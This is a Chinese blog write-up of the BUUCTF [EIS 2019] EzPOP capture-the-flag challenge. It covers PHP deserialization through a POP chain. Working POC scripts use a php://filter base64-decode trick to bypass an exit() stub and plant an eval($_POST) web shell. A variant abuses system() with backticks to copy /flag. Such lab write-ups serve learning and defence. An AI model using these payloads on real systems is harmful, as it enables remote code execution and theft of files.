[EIS2019]EzPOP--反序列化题目

最新推荐文章于 2024-09-03 23:10:05 发布
最新推荐文章于 2024-09-03 23:10:05 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: ctf web安全 文章标签: php 反序列化漏洞 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41401434/article/details/125363883
版权

目录

上代码,开搞

逆向数据流分析

$data链

$filename链

POC1

正向函数调用分析

绕过exit()

利用base64编码,拼接掉前面的exit  

完整POC:

使用反引号绕过

题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP

上代码,开搞

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

逆向数据流分析

发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推

我们需要分别找到$data的链和$filename的链

$data链

使options['data_compress']=false,不让$data压缩

data来自value,$data = $this->serialize($value);,

使options['serialize']=trim,这样serialize就变成trim函数了

serialize($value)为要写入的内容,由set传入

set由A的save调用,$this->store->set($this->key, $contents, $this->expire); 让$this->store = $b;才能调用set方法

value由$contents传入,分析$contents,$contents = $this->getForStorage();

进入getForStorage方法:返回值由$cleaned($this->cache控制), $this->complete控制,这里$this->cache有过滤,让$this->cache=array() ,并使$a->complete=payload

使$a->autosave=false,析构方法调用save方法

$filename链

在B的set中$filename = $this->getCacheKey($name);$name为set的参数1

getCacheKey中给name加了前缀,$this->options['prefix'] . $name,让$b->options['prefix']=文件名

save中$this->store->set($this->key, $contents, $this->expire);

总结,$a->key=.php,b->options['prefix']=要访问的文件名

POC1

给出目前的POC(注意:目前还不能得到flag,下文分析)

<?php
class A {
    protected $store;
    protected $key;
    protected $expire;

	public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }
}

class B {
}

$b = new B();
$b->options['data_compress']=false;
$b->options['serialize']='trim';
$b->options['prefix']='shell';


$a = new A($b,'.php',null);
$a->autosave=false;
$a->cache=array();
$a->complete='<?php phpinfo();?>';

echo urlencode(serialize($a));
?>

正向函数调用分析

我们再正向来一遍(加粗的使函数,标红的是数据)

入口函数是__destruct()$a->autosavefalse,进入if分支,调用save方法。

$contents 为getForStorage()的返回值

进入getForStorage()方法,$a->completepayload,返回{,payload}

此时$contents={,payload}$a->key=.php$a->store=$b

调用b的set方法,$b->set('.php',payload,null)

进入b的set方法

调用getExpireTime$expire=0

调用getCacheKey$filename=shell.php

后面又调用serialize方法,进入发现返回b->options['serialize'](data),也就是说b->options['serialize']是一个函数名,用来处理data,这里为trim()不影响data

b->options['data_compress']false,不进入if分支

此时$data=<?php\n//000000000000\n exit();?>\npayload

最后file_put_contentsdata写入shell.php

绕过exit()

我们在本地测试,发现payload能写入shell.php,但是前面有exit(),不能执行

利用base64编码,拼接掉前面的exit  

$b = new B();
$b->options['data_compress']=false;
$b->options['serialize']='trim';
$b->options['prefix']='php://filter/write=convert.base64-decode/resource=uploads/shell';


$a = new A($b,'.php',null);
$a->autosave=false;
$a->cache=array();
$a->complete='aaa'.base64_encode('<?php @eval($_POST["shell"]);?>');

echo urlencode(serialize($a));

完整POC:

<?php
class A {
    protected $store;
    protected $key;
    protected $expire;

	public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }
}

class B {
}

$b = new B();
$b->options['data_compress']=false;
$b->options['serialize']='trim';
$b->options['prefix']='php://filter/write=convert.base64-decode/resource=uploads/shell';


$a = new A($b,'.php',null);
$a->autosave=false;
$a->cache=array();
$a->complete='aaa'.base64_encode('<?php @eval($_POST["shell"]);?>');

echo urlencode(serialize($a));
?>

使用反引号绕过

参考自https://www.sec-in.com/article/333

$b = new B();
$b-&gt;writeTimes = 0;
$b -&gt; options = array('serialize' =&gt; "system",
    'data_compress' =&gt; false,
    'prefix' =&gt; "b");

$a = new A($store = $b, $key = ".php", $expire = 0);
$a-&gt;autosave = false;
$a-&gt;cache = array();
$a-&gt;complete = '`cat /flag &gt; ./flag.php`';

echo urlencode(serialize($a));

相当于

system('[[],"`cat /flag &gt; ./flag.php`"]')

在shell里执行的时候 反引号 的优先级是高于引号的,所以会先执行cat /flag > ./flag.php,flag就被写到flag.php里面去了

来自ctf小菜鸡的日常分享,欢迎各位大佬留言。

雨季丶
关注
专栏目录
BUUCTF__[EIS 2019]EzPOP_题解
风过江南乱的博客
04-28 1051
BUUCTF__[EIS 2019]EzPOP_题解 php反序列化
[EIS 2019]EzPOP
shinygod的博客
09-16 378
知识点:file_put_contents用php://filter绕过exit,代码审计
[CISCN 2022 初赛]ezpop(ThinkPHP6.0.12LTS代码审计)
最新发布
xiaole_shi的博客
09-03 1970
因为在学习的过程中间发现自己必须学会审计一些代码,因为自己之前也没有认真的进行过审计,之前遇到了一个thinkphp题目,但是直接利用了exp,没有仔细审过,所以这次我想仔细审一下,也算是希望自己能够真正进步和成长吧。🥹🥹。
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 7258
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
反序列化题目
weixin_45090021的博客
09-10 122
本题需要绕过一个__wakeup()函数和一个正则匹配preg_match('/[oc]:\d+:/i', $var)__wakeup():在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过。绕过__wakeup()是利用CVE-2016-7124漏洞,即反序列化时,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup( )的执行。正则匹配preg_match('/[oc]:\d+:/i', $var)如果出现的字符出现在存储的字典中则匹配成功。
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 377
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
Quidway S5328C-EI LS-S5328c-ei s5300ei-v200r005c00spc500.cc
03-21
Quidway S5328C-EI LS-S5328c-ei s5300ei-v200r005c00spc500.cc s5300ei-v200r005sph012.pat tftp EUPL-EN
eis-translation-tool:一种为客户翻译工作使我的生活不那么痛苦的工具
05-10
标题“eis-translation-tool”暗示我们正在讨论一个特定的软件工具,它专为简化翻译工作而设计。这个工具可能具有自动化和优化翻译流程的特性,从而减轻用户在处理多语言内容时的压力。 描述中提到的命令行操作是...
X60008EIS8-50的技术参数
12-12
产品型号:X60008EIS8-50输入电压(V):5.1~9.0输出电压(V):5初始精度:±5.0mV温度漂移:20ppm/℃工作电流:500nA封装/温度(℃):SOIC8/-40~85价格/1片(套):¥12.98 
MTK-EIS电子防抖-gyro校准
qq_40222981的博客
10-13 1573
1.进行Gyro Calibration 输入以下command adb root adb shell setenforce 0 adb shell chmod 777 /dev/hf_manager adb shell chmod 777 /dev/msensor adb shell chmod 777 /dev/gsensor adb shell chmod 777 /dev/als_ps adb shell chmod 777 /dev/gyroscope 进入EM mode_电话界面输入 *#*
EIS2019-EzPOP
ro4lsc的博客
05-14 1446
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
一道反序列化CTF题分享
seek_2022的博客
07-23 1203
一道有趣的CTF题目
PHP反序列化之练习题
shy的博客
11-29 1563
pikachu平台反序列化漏洞 第一题:反序列化漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
两道反序列化例题
limenzzz的博客
05-03 1288
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
EIS-Mapper: 2D/3D电化学阻抗谱映射软件
资源摘要信息:"EIS-Mapper:电化学阻抗谱映射器是一个用于绘制二维和三维EIS(电化学阻抗谱)地图的软件包。它使用Scilab环境作为其运行平台,并且可以兼容多种操作系统,包括Linux、Windows以及Apple OS X。为了使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值